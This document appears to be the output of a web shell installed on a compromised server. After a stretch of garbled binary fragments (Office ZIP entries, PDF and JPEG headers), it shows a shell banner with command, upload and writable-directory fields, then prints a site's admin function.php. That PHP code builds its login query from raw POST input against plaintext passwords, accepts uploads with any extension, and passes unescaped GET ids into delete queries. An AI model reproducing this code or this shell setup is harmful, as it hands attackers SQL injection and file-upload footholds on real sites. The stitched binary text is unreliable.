œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzÂœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :
ikan Uploader :
Directory :  /home/ni05r7l36tus/public_html/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /home/ni05r7l36tus/public_html/admin/function.php
<?php
include"connection/config.php"; 

if(isset($_REQUEST['login'])){


    $username = $_POST['username'];
    $password = $_POST['password'];


    // Query the database
    $sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";
    $result = $mysqli->query($sql);

    if ($result->num_rows > 0) {
        session_start();
        $_SESSION['loggedin'] = true;
        $_SESSION['username'] = $username;
        header("Location: index.php");
    } else {
       header("Location: login.php");
    }

}

///----Add slider image -----// 
if(isset($_REQUEST['add_slider'])){
	
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	 
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insert=$mysqli->query("INSERT INTO `slider` (`title`, `image`) VALUES ('$title', '$image_name')");
	if($insert)
	{
		
		header('location:slider.php');
	} 
}

if(isset($_REQUEST['update_slider'])){
	$id=$_REQUEST['id'];
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$update=$mysqli->query("UPDATE `slider` SET `title`='$title', `image`='$image_name' WHERE `id`='$id'");
	if($update)
	{
		
		header('location:slider.php');
	}
}

///----delete image of slider-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_slider')
{
$id=$_GET['id'];
$sql4=$mysqli->query("select * from `slider` where `id`='$id'");
$row = mysqli_fetch_array($sql4);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_slider =$mysqli->query("delete from `slider` where `id`='$id'");
if ($sql_slider==true) {
	header("location:slider.php");  
}

}



//--------add testimonial---------//
if(isset($_REQUEST['add_testimonial']))
{
if(isset($_REQUEST['cname']))
{
 $cname=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['cname']));
} 
if(isset($_REQUEST['testimonial']))
{
$testimonial=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['testimonial']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	
$layout_update=$mysqli->query("INSERT INTO `testimonial` (`image` ,`cname`,`testimonial`) VALUES ('$image_name','$cname','$testimonial')");

	if($layout_update)	
	{
		
			header("location:testimonial.php");
	}
}


///-------------update testimonial-----------//
if(isset($_REQUEST['update_testimonial']))
{
$id=$_REQUEST['id']; 
if(isset($_REQUEST['cname']))
{
$cname=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['cname']));
}
if(isset($_REQUEST['testimonial']))
{
$testimonial=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['testimonial']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
$layout_update=$mysqli->query("UPDATE `testimonial` SET `image`='$image_name',`cname`='$cname',`testimonial`='$testimonial' WHERE `id`='$id'");

    if($layout_update)  
    {
        
        header("location:testimonial.php");
    }
}	 
///----delete testimonail-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_testimonial')
{
$id=$_GET['id'];
$sql_testimonial =$mysqli->query("delete from `testimonial` where `id`='$id'");
if ($sql_testimonial==true) {
	header("location:testimonial.php");  
}

}



////-----------add blog-----//////
if(isset($_REQUEST['add_blog']))
{
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['adddate']))
{
$adddate=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['adddate']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}

if(isset($_REQUEST['description']))
{

 $description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

$date=date('d-m-Y');
// echo"INSERT INTO `blog` (`title`, `pagetitle`, `slug`,`keyword`,`seodescription`, `image`,`description`,`adddate`,`date`) VALUES ('$title','$pagetitle', `$slug`,'$keyword','$seodescription','$image_name','$description','$adddate','$date')";
// die();

$layout_blog=$mysqli->query("INSERT INTO `blog` (`title`, `pagetitle`, `slug`,`keyword`,`seodescription`, `image`,`description`,`adddate`,`date`) VALUES ('$title','$pagetitle', '$slug','$keyword','$seodescription','$image_name','$description','$adddate','$date')");

if ($layout_blog) {
	header("location:blog.php");
}else{
	header("location:add_blog.php");
}

            
	
}

//------Update Blogs------///
if(isset($_REQUEST['update_blog']))
{
$id=$_REQUEST['id'];
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
 $seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['adddate']))
{
$adddate=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['adddate']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}

if(isset($_REQUEST['description']))
{

$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

$layout_update1=$mysqli->query("UPDATE `blog` SET `title`='$title',`pagetitle`='$pagetitle',`slug`='$slug',`keyword`='$keyword',`seodescription`='$seodescription', `image`='$image_name',`description`='$description',`adddate`='$adddate' WHERE `id`='$id'");
	if($layout_update1)	
	{            
		
	header("location:blog.php");
		       
	}
	else{
		echo "Blog Has not Update";
	}
}
///----delete blog-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_blog')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `blog` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_blog =$mysqli->query("delete from `blog` where `id`='$id'");


if ($sql_blog == true)
 {
	     header("location:blog.php");  
     }
 

}
//-----END BLOG SECTION -----//




//--------add cars---------------//
if(isset($_REQUEST['add_resort']))
{
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}	
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
$seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
// echo"INSERT INTO `resort` (`title`,`slug`, `pagetitle`,`keyword`,`seodescription`,`image`, `description`) VALUES ('$title','$slug','$pagetitle','$keyword','$seodescription','$image','$description')";
// die();
$addresort=$mysqli->query("INSERT INTO `resort`(`title`,`slug`, `pagetitle`,`keyword`,`seodescription`,`image`, `description`) VALUES ('$title','$slug','$pagetitle','$keyword','$seodescription','$image_name','$description')");
	if($addresort)	
	{            
		$last_id = $mysqli->insert_id;
		if( isset($_FILES['images']['name']) &&  array_filter($_FILES['images']['name']) != NULL)
					{
					$arr1=$_FILES['images']['name'];
					$arr2=$_FILES['images']['tmp_name'];
					$arr=array_combine($arr1,$arr2);
					foreach($arr as $key=>$val)
					{
					$dir="../upload/";
					$images=$key;
					$images_tmp=$val;
					$images_extn = substr($images, strrpos($images, '.')+1);
					$images_name=rand(10,100).time().'.'.$images_extn;
					$size=filesize($val);
					$moveResult=move_uploaded_file($images_tmp, $dir . $images_name);
					if ($moveResult != true) {
					echo "ERROR: File not uploaded. Try again.";

					exit();
					}
					$insert_gallery=$mysqli->query("INSERT INTO `resort_images`(`resort_id` ,`images`) VALUES ('$last_id', '$images_name')");
					}
					
					}

		       

	header("location:resort.php");
		       
	}
	else{
		echo "Blog Has not Update";
	}

}


//------Update Blogs------///
if(isset($_REQUEST['update_resort']))
{
$id=$_REQUEST['id'];
if(isset($_REQUEST['title']))
{
$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
}	
if(isset($_REQUEST['slug']))
{
$slug=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['slug']));
}
if(isset($_REQUEST['pagetitle']))
{
$pagetitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['pagetitle']));
}
if(isset($_REQUEST['keyword']))
{
$keyword=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['keyword']));
}
if(isset($_REQUEST['seodescription']))
{
$seodescription=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['seodescription']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1); 
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}

// echo "UPDATE `resort` SET `title`='$title', `slug`='$slug', `pagetitle`='$pagetitle',`keyword`='$keyword',`seodescription`='$seodescription',`image`='$image_name', `description`='$description' WHERE `id`='$id'";
// die();
$layout_update1=$mysqli->query("UPDATE `resort` SET `title`='$title', `slug`='$slug', `pagetitle`='$pagetitle',`keyword`='$keyword',`seodescription`='$seodescription',`image`='$image_name', `description`='$description' WHERE `id`='$id'");
if($layout_update1)	
	{            
		$last_id = $id;
		if( isset($_FILES['images']['name']) &&  array_filter($_FILES['images']['name']) != NULL)
					{
					$arr1=$_FILES['images']['name'];
					$arr2=$_FILES['images']['tmp_name'];
					$arr=array_combine($arr1,$arr2);
					foreach($arr as $key=>$val)
					{
					$dir="../upload/";
					$images=$key;
					$images_tmp=$val;
					$images_extn = substr($images, strrpos($images, '.')+1);
					$images_name=rand(10,100).time().'.'.$images_extn;
					$size=filesize($val);
					$moveResult=move_uploaded_file($images_tmp, $dir . $images_name);
					if ($moveResult != true) {
					echo "ERROR: File not uploaded. Try again.";

					exit();
					}
					$insert_gallery=$mysqli->query("INSERT INTO `resort_images`(`resort_id` ,`images`) VALUES ('$last_id', '$images_name')");
					}
					}


           
		       

	header("location:resort.php");
		       
	}
	else{
		echo "Blog Has not Update";
	}

}


//---------delete multiple image--------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='multiimg')
{

$id=$_GET['id'];
$sql1=$mysqli->query("select * from `resort_images` where `id`='$id'");
$row = mysqli_fetch_array($sql1);
$img_name = $row['images'];
unlink("../upload/$img_name");
$sql =$mysqli->query("delete from `resort_images` where `id`='$id'");
if($sql)    
    {
        echo "npsucess";
    }
    else
    {
       echo "fail"; 
    }   
}



//-------delete features -----------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='features')
{

$id=$_GET['id'];
$sql =$mysqli->query("delete from `car_features` where `id`='$id'");
if($sql)    
    {
        echo "feature";
    }
    else
    {
       echo "fail"; 
    }   
}




//-----------delete car details --------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_resort')
{

$id=$_GET['id'];
$sql1=$mysqli->query("select * from `resort_images` where `resort_id`='$id'");
$row1 = mysqli_fetch_array($sql1);
$img_name2 = $row1['images'];
unlink("../upload/$img_name2");
$sql10 =$mysqli->query("delete from `resort_images` where `resort_id`='$id'");

$sql_car=$mysqli->query("select * from `resort` where `id`='$id'");
$row2 = mysqli_fetch_array($sql_car);
$img_name1 = $row2['image'];
unlink("../upload/$img_name1");
$sql_cars =$mysqli->query("delete from `resort` where `id`='$id'");


if ($sql_cars == true)
 {
	     header("location:resort.php");  
     }

   
}



	
//--------end cars---------------//



///-------------delete booking---------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_booking')
{
$id=$_GET['id'];
$sql_delete_booking =$mysqli->query("delete from `carbooking` where `id`='$id'");
if ($sql_delete_booking==true) {
	header("location:booking.php");  
}

}



///-------------delete Contact---------------//
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_contact')
{
$id=$_GET['id'];
$sql_contact =$mysqli->query("delete from `contact` where `id`='$id'");
if ($sql_contact==true) {
	header("location:contact.php");  
}

}



///----Add Gallery image -----// 
if(isset($_REQUEST['add_gallery'])){
	
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "")
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}  
	}
	
	$insertgallery=$mysqli->query("INSERT INTO `gallery` (`title`, `image`) VALUES ('$title', '$image_name')");
	if($insertgallery)
	{
		
		header('location:gallery.php');
	} 
}

if(isset($_REQUEST['update_gallery'])){
	$id=$_REQUEST['id'];
	if(isset($_REQUEST['title']))
	{
	$title=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['title']));
	}
	
	if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$size=filesize($_FILES['image']['tmp_name']);
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";

	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
	
	$updategallery=$mysqli->query("UPDATE `gallery` SET `title`='$title', `image`='$image_name' WHERE `id`='$id'");
	if($updategallery)
	{
		
		header('location:gallery.php');
	}
}

///----delete image of gallery-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_gallery')
{
$id=$_GET['id'];
$sql5=$mysqli->query("select * from `gallery` where `id`='$id'");
$row = mysqli_fetch_array($sql5);
$img_name = $row['image'];
unlink("../upload/$img_name");
$sql_gallery =$mysqli->query("delete from `gallery` where `id`='$id'");
if ($sql_gallery==true) {
	header("location:gallery.php");  
}

}






//--------add Offer---------//
if(isset($_REQUEST['add_offer']))
{
if(isset($_REQUEST['offertitle']))
{
 $offertitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['offertitle']));
} 
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}
if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	
$layout_offer=$mysqli->query("INSERT INTO `offer` (`offertitle` ,`image`,`description`) VALUES ('$offertitle','$image_name','$description')");

	if($layout_offer)	
	{
		
			header("location:offer.php");
	}
}


///-------------update Offer-----------//
if(isset($_REQUEST['update_offer']))
{
$id=$_REQUEST['id']; 
if(isset($_REQUEST['offertitle']))
{
$offertitle=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['offertitle']));
}
if(isset($_REQUEST['description']))
{
$description=mysqli_real_escape_string($mysqli,htmlentities($_REQUEST['description']));
}

if( isset($_FILES['image']['name']) &&  $_FILES['image']['name'] != "" )
	{
	$dir="../upload/";
	$image=$_FILES['image']['name'];
	$image_tmp=$_FILES['image']['tmp_name'];
	$image_extn = substr($image, strrpos($image, '.')+1);
	$image_name=rand(10,100).time().'.'.$image_extn;
	$moveResult=move_uploaded_file($image_tmp, $dir . $image_name);
	if ($moveResult != true) {
	echo "ERROR: File not uploaded. Try again.";
	exit();
	}
	}
	else
	{
	$image_name=$_POST['hidden_image'];
	}
$offer_update=$mysqli->query("UPDATE `offer` SET `offertitle`='$offertitle',`image`='$image_name',`description`='$description' WHERE `id`='$id'");

    if($offer_update)  
    {
        
        header("location:offer.php");
    }
}	 
///----delete testimonail-----/// 
if(isset($_REQUEST['action']) && $_REQUEST['action']=='delete_offer')
{
$id=$_GET['id'];
$sql_offer =$mysqli->query("delete from `offer` where `id`='$id'");
if ($sql_offer==true) {
	header("location:offer.php");  
}

}


 ?>

........